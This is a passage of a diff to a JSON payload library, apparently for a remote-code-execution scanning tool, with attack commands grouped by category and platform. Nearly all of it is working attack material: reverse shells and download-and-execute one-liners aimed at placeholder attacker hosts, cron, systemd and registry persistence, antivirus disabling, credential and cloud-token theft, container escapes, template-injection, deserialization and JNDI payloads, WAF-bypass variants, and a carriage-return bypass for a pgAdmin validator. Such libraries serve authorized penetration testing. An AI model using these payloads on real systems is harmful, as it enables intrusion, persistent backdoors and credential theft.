-                "grep -R 'NOPASSWD' /etc/sudoers /etc/sudoers.d 2>/dev/null"
-            ],
-            "windows": [
-                "whoami /priv",
-                "whoami /groups",
-                "icacls C:\\\\Windows\\\\System32\\\\cmd.exe",
-                "wmic qfe get Caption,Description,HotFixID,InstalledOn",
-                "powershell -Command \"Get-Service | Where-Object {$_.Status -eq 'Running' -and $_.StartType -eq 'Auto'}\""
-            ],
-            "docker": [
-                "cat /proc/self/cgroup",
-                "ls -l /host 2>/dev/null",
-                "find / -maxdepth 2 -name docker.sock 2>/dev/null"
-            ],
-            "kubernetes": [
-                "kubectl auth can-i * *",
-                "kubectl describe clusterrolebinding",
-                "kubectl get pods -A -o wide"
-            ]
-        },
-        "persistence": {
-            "unix": [
-                "echo '@reboot /usr/bin/curl http://{attacker_domain}/shell.sh | sh' | crontab -",
-                "echo '*/5 * * * * /usr/bin/wget http://{attacker_domain}/payload.sh -O /tmp/payload.sh && sh /tmp/payload.sh' >> /etc/crontab",
-                "echo 'bash -i >& /dev/tcp/{attacker_ip}/443 0>&1' >> ~/.bashrc",
-                "mkdir -p ~/.config/systemd/user; echo -e '[Service]\nExecStart=/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"\n[Install]\nWantedBy=default.target' > ~/.config/systemd/user/update.service",
-                "echo '*/10 * * * * root /usr/bin/python3 -c \"import urllib.request; exec(urllib.request.urlopen(\\'http://{attacker_domain}/s.py\\').read())\"' >> /etc/cron.d/system"
-            ],
-            "windows": [
-                "reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v Updater /t REG_SZ /d C:\\\\Windows\\\\Temp\\\\backdoor.exe /f",
-                "schtasks /Create /SC ONLOGON /TN Updater /TR \\\"powershell.exe -ExecutionPolicy Bypass -File %TEMP%\\\\backdoor.ps1\\\" /F",
-                "powershell -Command \"New-ItemProperty -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name Sync -Value 'powershell -nop -w hidden -c Invoke-WebRequest http://{attacker_domain}/sync.ps1 -OutFile $env:TEMP\\\\sync.ps1; & $env:TEMP\\\\sync.ps1'\"",
-                "powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"",
-                "copy %SystemRoot%\\\\System32\\\\cmd.exe %APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\update.exe"
-            ]
-        },
-        "cloud_metadata": {
-            "unix": [
-                "curl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",
-                "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/",
-                "wget -q -O- http://169.254.169.254/metadata/instance?api-version=2021-02-01 -H 'Metadata:true'",
-                "aws sts get-caller-identity",
-                "curl http://100.100.100.200/latest/meta-data/ram/security-credentials/"
-            ],
-            "windows": [
-                "powershell -Command \"Invoke-WebRequest -Headers @{'Metadata-Flavor'='Google'} -Uri http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\"",
-                "powershell -Command \"Invoke-RestMethod -Headers @{Metadata='true'} -Uri http://169.254.169.254/metadata/instance?api-version=2021-02-01\"",
-                "powershell -Command \"Invoke-WebRequest -Uri http://169.254.169.254/latest/meta-data/iam/security-credentials/\"",
-                "powershell -Command \"Invoke-RestMethod -Uri http://100.100.100.200/latest/meta-data/ram/security-credentials/\""
-            ],
-            "docker": [
-                "curl --connect-timeout 1 http://169.254.169.254/latest/meta-data/",
-                "ip route",
-                "nsenter --target 1 --mount --uts --ipc --net --pid curl http://169.254.169.254/latest/meta-data/"
-            ],
-            "kubernetes": [
-                "kubectl get secrets -n kube-system aws-auth -o yaml",
-                "curl -k -H 'Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)' https://kubernetes.default.svc/api",
-                "kubectl get configmap -n kube-system cluster-info -o yaml"
-            ]
-        },
-        "database_enumeration": {
-            "unix": [
-                "mysql -e \"SHOW DATABASES;\"",
-                "psql -c \"SELECT table_schema,table_name FROM information_schema.tables LIMIT 10;\"",
-                "mongo --quiet --eval \"db.adminCommand({listDatabases:1})\"",
-                "sqlite3 /etc/passwd \"SELECT * FROM sqlite_master;\"",
-                "redis-cli INFO"
-            ],
-            "windows": [
-                "sqlcmd -Q \"SELECT name FROM sys.databases\"",
-                "powershell -Command \"Invoke-Sqlcmd -Query \"\"SELECT name FROM master..sysdatabases\"\"\"",
-                "wmic path win32_service get Name,PathName | findstr /i sql"
-            ],
-            "php": [
-                "$pdo = new PDO('mysql:host=127.0.0.1', 'root', ''); foreach($pdo->query('SHOW DATABASES') as $row){echo $row[0] . \"\\n\";}",
-                "echo mysqli_get_host_info(mysqli_connect('127.0.0.1', 'root', ''));",
-                "$db = new PDO('sqlite:/var/www/html/database.sqlite'); foreach($db->query('SELECT name FROM sqlite_master') as $row){echo $row['name'];}"
-            ],
-            "python": [
-                "import sqlite3; [print(row) for row in sqlite3.connect('app.db').execute(\"SELECT name FROM sqlite_master WHERE type='table'\")]",
-                "import pymongo; client = pymongo.MongoClient('mongodb://127.0.0.1:27017'); print(client.list_database_names())",
-                "import mysql.connector; conn = mysql.connector.connect(user='root',password='',host='127.0.0.1'); cursor = conn.cursor(); cursor.execute('SHOW DATABASES'); print(cursor.fetchall())"
-            ]
-        },
-        "lateral_movement": {
-            "unix": [
-                "ssh -oStrictHostKeyChecking=no user@{attacker_ip}",
-                "for host in $(cut -d' ' -f1 /etc/hosts); do ssh -oBatchMode=yes $host uptime; done",
-                "scp /etc/passwd {attacker_ip}:/tmp/passwd_copy",
-                "ansible all -i {attacker_ip}, -m shell -a 'whoami'",
-                "rsh {attacker_ip} whoami"
-            ],
-            "windows": [
-                "wmic /node:{attacker_ip} process call create 'cmd.exe /c whoami'",
-                "psexec \\\\{attacker_ip} cmd.exe /c whoami",
-                "winrs -r:{attacker_ip} cmd",
-                "powershell -Command \"Invoke-Command -ComputerName {attacker_ip} -ScriptBlock { whoami }\"",
-                "net use \\\\{attacker_ip}\\\\C$"
-            ]
-        },
-        "waf_bypass": {
-            "unix": [
-                "cat${IFS}/etc/passwd",
-                "cat$IFS/etc/passwd",
-                "cat${IFS%??}/etc/passwd",
-                "{cat,/etc/passwd}",
-                "cat</etc/passwd",
-                "who$@ami",
-                "uname${IFS}-a",
-                "i\\d"
-            ],
-            "windows": [
-                "who^ami",
-                "wh^o^ami",
-                "type%09C:\\Windows\\win.ini",
-                "cmd /c who^ami"
-            ]
-        },
-        "oob": {
-            "unix": [
-                "curl http://{oob}/",
-                "wget -qO- http://{oob}/",
-                "nslookup {oob}",
-                "ping -c 1 {oob}",
-                "dig {oob}",
-                "curl http://{oob}/$(whoami)",
-                "curl http://$(whoami).{oob}/"
-            ],
-            "windows": [
-                "nslookup {oob}",
-                "powershell -c \"Invoke-WebRequest -UseBasicParsing http://{oob}/\"",
-                "powershell -c \"Resolve-DnsName {oob}\"",
-                "certutil -urlcache -f http://{oob}/ %TEMP%\\x",
-                "cmd /c nslookup %USERNAME%.{oob}"
-            ],
-            "java": [
-                "${jndi:ldap://{oob}/a}",
-                "${jndi:dns://{oob}/a}",
-                "${jndi:rmi://{oob}/a}"
-            ]
-        },
-        "nosql_injection": {
-            "mongodb": {
-                "operator_injection": [
-                    "{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null}}",
-                    "{\"username\": {\"$gt\": \"\"}, \"password\": {\"$gt\": \"\"}}",
-                    "{\"username\": \"admin\", \"password\": {\"$regex\": \"^.*\"}}",
-                    "username[$ne]=admin&password[$ne]=x",
-                    "{\"$or\": [{}, {\"x\": \"y\"}], \"username\": \"admin\"}"
-                ],
-                "where_js": [
-                    "{\"$where\": \"return true\"}",
-                    "{\"$where\": \"this.password == this.username\"}",
-                    "{\"$where\": \"sleep(5000)\"}",
-                    "admin' || '1'=='1",
-                    "'; return true; var x='"
-                ],
-                "server_side_js": [
-                    "{\"$expr\": {\"$function\": {\"body\": \"function(){return true}\", \"args\": [], \"lang\": \"js\"}}}",
-                    "{\"$expr\": {\"$function\": {\"body\": \"function(){return sleep(5000)}\", \"args\": [], \"lang\": \"js\"}}}",
-                    "{\"$accumulator\": {\"init\": \"function(){return sleep(5000)}\", \"accumulate\": \"function(){}\", \"accumulateArgs\": [], \"merge\": \"function(){}\", \"lang\": \"js\"}}"
-                ]
-            }
-        },
-        "graphql_injection": {
-            "graphql": {
-                "introspection": [
-                    "{__schema{types{name}}}",
-                    "{__schema{queryType{name} mutationType{name} types{name fields{name}}}}",
-                    "{__type(name:\"User\"){name fields{name type{name kind}}}}",
-                    "query{__typename}"
-                ],
-                "injection": [
-                    "{ user(id: \"1; id\") { name } }",
-                    "{ user(id: \"1' OR '1'='1-- \") { name } }",
-                    "{ search(q: \"$(id)\") { id } }",
-                    "{ file(path: \"../../../../etc/passwd\") { content } }",
-                    "{ user(id: \"1${IFS}||${IFS}id\") { name } }"
-                ],
-                "batching": [
-                    "{ a: user(id:\"1\"){name} b: user(id:\"2\"){name} c: user(id:\"3\"){name} }",
-                    "query { a { b { c { d { e } } } } }"
-                ]
-            }
-        }
+  "payload_categories": {
+    "basic_enum": {
+      "unix": [
+        "id",
+        "whoami",
+        "uname -a",
+        "pwd",
+        "ls -la",
+        "ps aux",
+        "uptime",
+        "cat /etc/os-release",
+        "env",
+        "last -n 5",
+        "lsb_release -a 2>/dev/null"
+      ],
+      "windows": [
+        "whoami",
+        "ver",
+        "dir",
+        "tasklist",
+        "ipconfig",
+        "systeminfo",
+        "wmic os get Caption,CSDVersion,OSArchitecture,Version",
+        "set",
+        "query user",
+        "whoami /groups"
+      ]
     },
-    "detection_payloads": {
-        "unix": [
-            "echo DETECTION_{canary}",
-            "sleep 5",
-            "printf 'canary:%s' $(hostname)",
-            "command -v whoami && echo HEALTH_{canary}",
-            "printf 'det:%s' $(id -u)",
-            "curl http://{oob}/",
-            "nslookup {oob}"
+    "file_operations": {
+      "unix": [
+        "cat /etc/passwd",
+        "cat /etc/shadow",
+        "head -n 10 /etc/passwd",
+        "tail -f /var/log/syslog",
+        "find / -name '*.conf' -type f 2>/dev/null",
+        "ls -la /root 2>/dev/null",
+        "find /home -maxdepth 2 -type f -name '.ssh' 2>/dev/null",
+        "find / -perm -4000 -type f 2>/dev/null",
+        "getfacl -R /home 2>/dev/null",
+        "tar -cf /tmp/etc_backup.tar /etc 2>/dev/null"
+      ],
+      "windows": [
+        "type C:\\Windows\\System32\\drivers\\etc\\hosts",
+        "dir C:\\Windows\\System32\\drivers\\etc",
+        "dir C:\\Users",
+        "dir C:\\\\ProgramData",
+        "type C:\\\\Windows\\\\System32\\\\config\\\\SAM 2>nul",
+        "dir %USERPROFILE%\\\\Documents",
+        "type %USERPROFILE%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data 2>nul"
+      ]
+    },
+    "network_operations": {
+      "unix": [
+        "ifconfig",
+        "netstat -tulpn",
+        "arp -a",
+        "ping -c 4 127.0.0.1",
+        "ip addr",
+        "ss -tunlp",
+        "route -n",
+        "dig +short myip.opendns.com @resolver1.opendns.com"
+      ],
+      "windows": [
+        "ipconfig /all",
+        "netstat -ano",
+        "arp -a",
+        "ping -n 4 127.0.0.1",
+        "Get-NetIPConfiguration",
+        "route print",
+        "powershell -Command \"Resolve-DnsName {attacker_domain}\"",
+        "powershell -Command \"(Invoke-WebRequest -UseBasicParsing https://ifconfig.me).Content\""
+      ]
+    },
+    "code_execution": {
+      "nodejs": {
+        "child_process_exec": [
+          "require('child_process').exec('whoami')",
+          "require('child_process').exec('cat /etc/passwd | nc {attacker_ip} 443')",
+          "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"')",
+          "require('child_process').spawnSync('whoami').stdout.toString()",
+          "process.mainModule.require('child_process').exec('id')"
         ],
-        "windows": [
-            "echo DETECTION_{canary}",
-            "timeout /T 5",
-            "powershell -Command \"Start-Sleep -Seconds 3; Write-Output 'DETECTION_{canary}'\"",
-            "for /f \"tokens=2 delims==\" %i in (\"%TIME%\") do @echo DETECTION_{canary}:%i",
-            "powershell -Command \"[Console]::WriteLine('det-{canary}')\"",
-            "nslookup {oob}"
+        "pug_ssti": [
+          "= 7 * 7",
+          "= require('child_process').exec('whoami')",
+          "= global.process.mainModule.require('child_process').exec('id')"
         ],
-        "php": [
-            "echo 'DETECTION_{canary}';",
-            "error_log('DETECTION_{canary}');",
-            "var_dump('DETECTION_{canary}');"
+        "ejs_ssti": [
+          "<%= 7 * 7 %>",
+          "<%= require('child_process').exec('whoami') %>",
+          "<%- global.process.mainModule.require('child_process').exec('id') %>"
         ],
-        "python": [
-            "print('DETECTION_{canary}')",
-            "import time; time.sleep(2)",
-            "import os; print(f'detect:{canary}:{os.getpid()}')",
-            "__import__('time').sleep(1)"
+        "handlebars_ssti": [
+          "{{7 * 7}}",
+          "{{ {math} }}",
+          "{{lookup (lookup (lookup (lookup __proto__ 'constructor') 'constructor') 'call') 'whoami'}}",
+          "{{#with (lookup (lookup this '__proto__') 'constructor')}}{{#with (lookup this 'constructor')}}{{call this 'cat /etc/passwd'}}{{/with}}{{/with}}"
         ],
-        "nodejs": [
-            "console.log('DETECTION_{canary}')",
-            "setTimeout(()=>console.log('timer {canary}'), 1000)",
-            "process.stdout.write('detect-{canary}')",
-            "setImmediate(()=>console.log('det:{canary}'))"
+        "vm_eval": [
+          "(new (require('vm').Script)(`require('child_process').exec('whoami')`)).runInThisContext()",
+          "vm.runInNewContext(`require('child_process').exec('curl http://{attacker_domain}/x.sh | sh')`, {}, { timeout: 1000 })",
+          "require('vm').runInNewContext(`process.mainModule.require('child_process').exec('id')`)"
         ],
-        "java": [
-            "System.out.println(\"DETECTION_{canary}\");",
-            "Thread.sleep(2000);",
-            "System.err.println(\"DETECTION_{canary}\");",
-            "System.out.printf(\"det:%s\\n\", \"{canary}\");"
+        "deserialization": [
+          "const serialize = require('node-serialize'); const payload = \"{\\\"rce\\\": \\\"_$$ND_FUNC$$_function(){require('child_process').exec('id');}()\\\"}\"; serialize.unserialize(payload);",
+          "const payload = \"{\\\"rce\\\":\\\"_$$ND_FUNC$$_function(){process.mainModule.require('child_process').exec('id');}()\\\"}\"; require('node-serialize').unserialize(payload);"
         ],
-        "dotnet": [
-            "Console.WriteLine(\"DETECTION_{canary}\");",
-            "System.Threading.Thread.Sleep(2000);",
-            "Console.Error.WriteLine(\"det-{canary}\");"
-        ],
-        "docker": [
-            "echo 'detector:{canary}'",
-            "sleep 2",
-            "cat /proc/1/cgroup | head -n 5"
-        ],
-        "kubernetes": [
-            "kubectl get pods --namespace default",
-            "echo 'kube-detect-{canary}'",
-            "kubectl cluster-info"
-        ],
-        "ruby": [
-            "puts 'DETECTION_{canary}'",
-            "sleep 1"
-        ],
-        "perl": [
-            "print \"DETECTION_{canary}\\n\";",
-            "select(undef, undef, undef, 1);"
-        ],
-        "go": [
-            "fmt.Println(\"DETECTION_{canary}\")",
-            "time.Sleep(1 * time.Second)"
-        ],
-        "sql": [
-            "SELECT 'DETECTION_{canary}';",
-            "SELECT pg_sleep(1);"
-        ],
-        "powershell": [
-            "Write-Output \"DETECTION_{canary}\"",
-            "Start-Sleep -Milliseconds 500"
+        "expression_template": [
+          "{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
+          "={{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
+          "{{ (function(){ return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}",
+          "={{ $jmespath ? '' : (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}"
         ]
+      },
+      "python": {
+        "os_system": [
+          "os.system('whoami')",
+          "os.system('cat /etc/passwd')",
+          "os.system('bash -i >& /dev/tcp/{attacker_ip}/443 0>&1')",
+          "__import__('os').system('id')",
+          "os.popen('hostname').read()"
+        ],
+        "subprocess": [
+          "subprocess.call(['whoami'], shell=True)",
+          "subprocess.Popen('cat /etc/passwd', shell=True).communicate()",
+          "subprocess.check_output('uname -a', shell=True)"
+        ],
+        "jinja2_ssti": [
+          "{{7*7}}",
+          "{{ {math} }}",
+          "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
+          "{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}",
+          "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
+          "{{cycler.__init__.__globals__['os'].popen('whoami').read()}}",
+          "{{''.__class__.__mro__[2].__subclasses__()[40]('/bin/sh',shell=True,stdout=-1).communicate()}}"
+        ],
+        "exec_ast": [
+          "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef _(): pass",
+          "@exec(\"raise Exception(open('/etc/passwd').read())\")\ndef _(): pass",
+          "def _(a=exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")): pass",
+          "def _(a=exec(\"raise Exception(open('/etc/passwd').read())\")): pass",
+          "def _(a=__import__('os').system('id')): pass"
+        ]
+      },
+      "postgres": {
+        "psql_meta_command": [
+          "SELECT 1;\n\\! id\n",
+          "SELECT 1;\n\\! cat /etc/passwd\n",
+          {
+            "payload": "SELECT 1;\r\\! id\r",
+            "notes": [
+              "CR (\\r) separates the meta-command so a newline-based validator (e.g. pgAdmin CVE-2025-13780) does not detect the \\! line"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! cat /etc/passwd\r",
+            "notes": [
+              "CR (\\r) meta-command bypass; psql still executes \\! after splitting on CR"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! bash -c 'id > /tmp/rcekit_{canary}'\r",
+            "expected_channel": "response",
+            "notes": [
+              "blind sink: confirm out-of-band or via the written marker rather than the HTTP response"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! curl -s {callback}\r",
+            "notes": [
+              "blind async sink: {callback} is filled by the chain runner with the OOB listener URL; confirmation is the received callback, not the HTTP response"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! python3 -c 'import urllib.request;urllib.request.urlopen(\"{callback}\")'\r",
+            "notes": [
+              "blind async sink, curl-free OOB callback via python3; confirmed by the received callback"
+            ]
+          }
+        ]
+      },
+      "php": {
+        "exec_system": [
+          "system('whoami')",
+          "exec('whoami')",
+          "shell_exec('whoami')",
+          "passthru('whoami')",
+          "eval('system(\"whoami\")')",
+          "preg_replace('/.*/e','system(\"whoami\")','')",
+          "$output = shell_exec('whoami'); echo $output;",
+          "system($_GET['cmd']);",
+          "shell_exec('curl http://{attacker_domain}/payload.sh | sh');"
+        ],
+        "eval": [
+          "assert(\"system('whoami')\");",
+          "@create_function(\"\", \"system('ls');\");",
+          "eval(base64_decode('c3lzdGVtKCd3aG9hbWknKTs='));"
+        ],
+        "deserialize": [
+          "$payload = file_get_contents('php://input'); $object = unserialize($payload);",
+          "$obj = unserialize($_POST['payload']); var_dump($obj);"
+        ]
+      },
+      "java": {
+        "runtime_exec": [
+          "Runtime.getRuntime().exec(\"whoami\")",
+          "new ProcessBuilder(\"whoami\").start()",
+          "Runtime.getRuntime().exec(\"cat /etc/passwd\")",
+          "Process process = new ProcessBuilder().command(\"bash\",\"-c\",\"id\").start();",
+          "Runtime.getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"});"
+        ],
+        "freemarker_ssti": [
+          "${7*7}",
+          "${'freemarker.template.utility.Execute'?new()('id')}",
+          "<#assign ex = 'freemarker.template.utility.Execute'?new()>${ ex('id')}",
+          "${'freemarker.template.utility.Execute'?new()('cat /etc/passwd')}"
+        ],
+        "velocity_ssti": [
+          "#set($x='') $x",
+          "#set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $d=$ex.getInputStream() $d=$chr.toChars($d.readBytes($d.available())) $out=$str.valueOf($d) $out",
+          "#set($process=$x.class.forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')) $process"
+        ],
+        "thymeleaf_ssti": [
+          "[[${7*7}]]",
+          "[[${T(java.lang.Runtime).getRuntime().exec('id')}]]",
+          "[[${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}]]"
+        ],
+        "deserialization": [
+          "new ObjectInputStream(new ByteArrayInputStream(payload)).readObject(); // ysoserial gadget",
+          "new ObjectInputStream(new FileInputStream(\"payload.bin\")).readObject();"
+        ],
+        "expression": [
+          "javax.script.ScriptEngineManager m = new javax.script.ScriptEngineManager(); m.getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('id')\");",
+          "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"java.lang.Runtime.getRuntime().exec('cat /etc/passwd')\");"
+        ],
+        "spel": [
+          "T(java.lang.Runtime).getRuntime().exec(\"id\")",
+          "new java.lang.ProcessBuilder(new String[]{\"bash\",\"-c\",\"id\"}).start()",
+          "T(java.lang.Runtime).getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"})"
+        ],
+        "ognl": [
+          "(#rt=@java.lang.Runtime@getRuntime()).exec(\"id\")",
+          "%{(#rt=@java.lang.Runtime@getRuntime()).(#rt.exec(\"id\"))}",
+          "(#cmd=\"id\").(#p=new java.lang.ProcessBuilder(#cmd)).(#p.start())"
+        ],
+        "groovy": [
+          "\"id\".execute()",
+          "[\"bash\",\"-c\",\"id\"].execute()",
+          "Runtime.getRuntime().exec(\"id\")",
+          "this.class.classLoader.parseClass(\"Runtime.getRuntime().exec('id')\").newInstance()"
+        ]
+      },
+      "dotnet": {
+        "process_start": [
+          "Process.Start(\"whoami.exe\")",
+          "Process.Start(\"cmd.exe\", \"/c whoami\")",
+          "new Process { StartInfo = new ProcessStartInfo { FileName = \"cmd.exe\", Arguments = \"/c whoami\" } }.Start()",
+          "Process.Start(new ProcessStartInfo(\"cmd.exe\"){Arguments=\"/c whoami\",UseShellExecute=false,RedirectStandardOutput=true});",
+          "System.Diagnostics.Process.Start(\"powershell.exe\",\"-Command \\\"Get-Process\\\"\");"
+        ],
+        "deserialize": [
+          "new BinaryFormatter().Deserialize(new MemoryStream(payload)); // Gadget execution",
+          "new NetDataContractSerializer().Deserialize(new MemoryStream(payload));"
+        ]
+      },
+      "ruby": {
+        "kernel_system": [
+          "system('whoami')",
+          "`whoami`",
+          "Kernel.system('whoami')",
+          "Kernel.exec('whoami')",
+          "IO.popen('id'){|io| io.read }",
+          "%x(id)"
+        ],
+        "erb_ssti": [
+          "<%= 7 * 7 %>",
+          "<%= `whoami` %>",
+          "<%= File.open('/etc/passwd').read %>",
+          "<%= IO.popen('id'){|io| io.read } %>"
+        ]
+      },
+      "perl": {
+        "system_backticks": [
+          "system('whoami')",
+          "`whoami`",
+          "exec('whoami')",
+          "print `id`;",
+          "open(my $fh, '-|', 'id'); while(<$fh>){print;}"
+        ]
+      },
+      "go": {
+        "os_exec": [
+          "exec.Command(\"whoami\").Output()",
+          "exec.Command(\"bash\", \"-c\", \"whoami\").Output()",
+          "exec.Command(\"cat\", \"/etc/passwd\").Output()",
+          "cmd := exec.Command(\"sh\",\"-c\",\"id\"); out, _ := cmd.CombinedOutput(); string(out)",
+          "exec.Command(\"powershell\",\"-Command\",\"whoami\").Output()"
+        ]
+      }
+    },
+    "download_execute": {
+      "unix": [
+        "curl http://{attacker_domain}/shell.sh | sh",
+        "wget http://{attacker_domain}/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
+        "python3 -c \"import urllib.request; exec(urllib.request.urlopen('http://{attacker_domain}/shell.py').read())\"",
+        "perl -e 'use LWP::Simple; getstore(\"http://{attacker_domain}/shell\", \"/tmp/shell\"); system(\"/tmp/shell\");'",
+        "php -r \"$c=file_get_contents('http://{attacker_domain}/payload.php'); eval($c);\""
+      ],
+      "windows": [
+        "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://{attacker_domain}/shell.ps1')\"",
+        "certutil -urlcache -f http://{attacker_domain}/shell.exe shell.exe && shell.exe",
+        "bitsadmin /transfer job /download /priority high http://{attacker_domain}/shell.exe shell.exe && shell.exe",
+        "powershell -c \"Invoke-WebRequest -Uri 'http://{attacker_domain}/shell.ps1' -OutFile $env:TEMP\\shell.ps1; . $env:TEMP\\shell.ps1\""
+      ]
+    },
+    "reverse_shells": {
+      "unix": [
+        "bash -i >& /dev/tcp/{attacker_ip}/443 0>&1",
+        "nc -e /bin/sh {attacker_ip} 443",
+        "python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"{attacker_ip}\",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'",
+        "perl -e 'use Socket;$i=\"{attacker_ip}\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
+        "php -r '$sock=fsockopen(\"{attacker_ip}\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
+      ],
+      "windows": [
+        "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()\"",
+        "powershell -nop -w hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"",
+        "cmd.exe /c powershell -Command \"$sm=(New-Object Net.Sockets.TCPClient('{attacker_ip}',443)).GetStream();$sw=New-Object IO.StreamWriter($sm);$sr=New-Object IO.StreamReader($sm);while(($cmd=$sr.ReadLine()) -ne $null){$send=(iex $cmd 2>&1 | Out-String);$sw.WriteLine($send);$sw.Flush()}\""
+      ]
+    },
+    "container_escape": {
+      "docker": [
+        "cat /proc/1/environ",
+        "nsenter --target 1 --mount --uts --ipc --net --pid /bin/sh",
+        "cp /bin/sh /host/tmp/sh && chmod +s /host/tmp/sh",
+        "mount | grep overlay",
+        "docker run -v /:/host alpine chroot /host /bin/sh"
+      ],
+      "kubernetes": [
+        "kubectl get pods --namespace kube-system",
+        "kubectl run rce --image=alpine --restart=Never --command -- sh -c 'nc {attacker_ip} 443 -e /bin/sh'",
+        "kubectl exec -n kube-system kube-apiserver-0 -- cat /etc/kubernetes/admin.conf",
+        "kubectl auth can-i --list",
+        "kubectl get secrets -A"
+      ]
+    },
+    "credential_access": {
+      "unix": [
+        "grep -Ri 'password' /etc 2>/dev/null",
+        "ls -la ~/.ssh",
+        "cat ~/.ssh/id_rsa 2>/dev/null",
+        "find / -name 'id_rsa' -o -name '*.kdbx' 2>/dev/null",
+        "awk -F: '{ if ($2 != \"*\" && $2 != \"!\") print $1 }' /etc/shadow 2>/dev/null"
+      ],
+      "windows": [
+        "cmdkey /list",
+        "dir C:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials",
+        "reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon",
+        "findstr /si password *.txt *.config *.ini",
+        "type %USERPROFILE%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\* 2>nul"
+      ],
+      "php": [
+        "$config = include 'config.php'; var_dump($config);",
+        "echo file_get_contents(__DIR__ . '/.env');",
+        "echo file_get_contents('/var/www/html/config/database.php');"
+      ],
+      "python": [
+        "import os; print(os.environ.get('AWS_SECRET_ACCESS_KEY'))",
+        "from pathlib import Path; print(Path.home().joinpath('.aws','credentials').read_text())",
+        "import keyring; print(keyring.get_keyring())"
+      ]
+    },
+    "privilege_escalation": {
+      "unix": [
+        "sudo -l",
+        "cat /etc/sudoers",
+        "find / -perm -4000 -type f 2>/dev/null",
+        "getcap -r / 2>/dev/null",
+        "grep -R 'NOPASSWD' /etc/sudoers /etc/sudoers.d 2>/dev/null"
+      ],
+      "windows": [
+        "whoami /priv",
+        "whoami /groups",
+        "icacls C:\\\\Windows\\\\System32\\\\cmd.exe",
+        "wmic qfe get Caption,Description,HotFixID,InstalledOn",
+        "powershell -Command \"Get-Service | Where-Object {$_.Status -eq 'Running' -and $_.StartType -eq 'Auto'}\""
+      ],
+      "docker": [
+        "cat /proc/self/cgroup",
+        "ls -l /host 2>/dev/null",
+        "find / -maxdepth 2 -name docker.sock 2>/dev/null"
+      ],
+      "kubernetes": [
+        "kubectl auth can-i * *",
+        "kubectl describe clusterrolebinding",
+        "kubectl get pods -A -o wide"
+      ]
+    },
+    "persistence": {
+      "unix": [
+        "echo '@reboot /usr/bin/curl http://{attacker_domain}/shell.sh | sh' | crontab -",
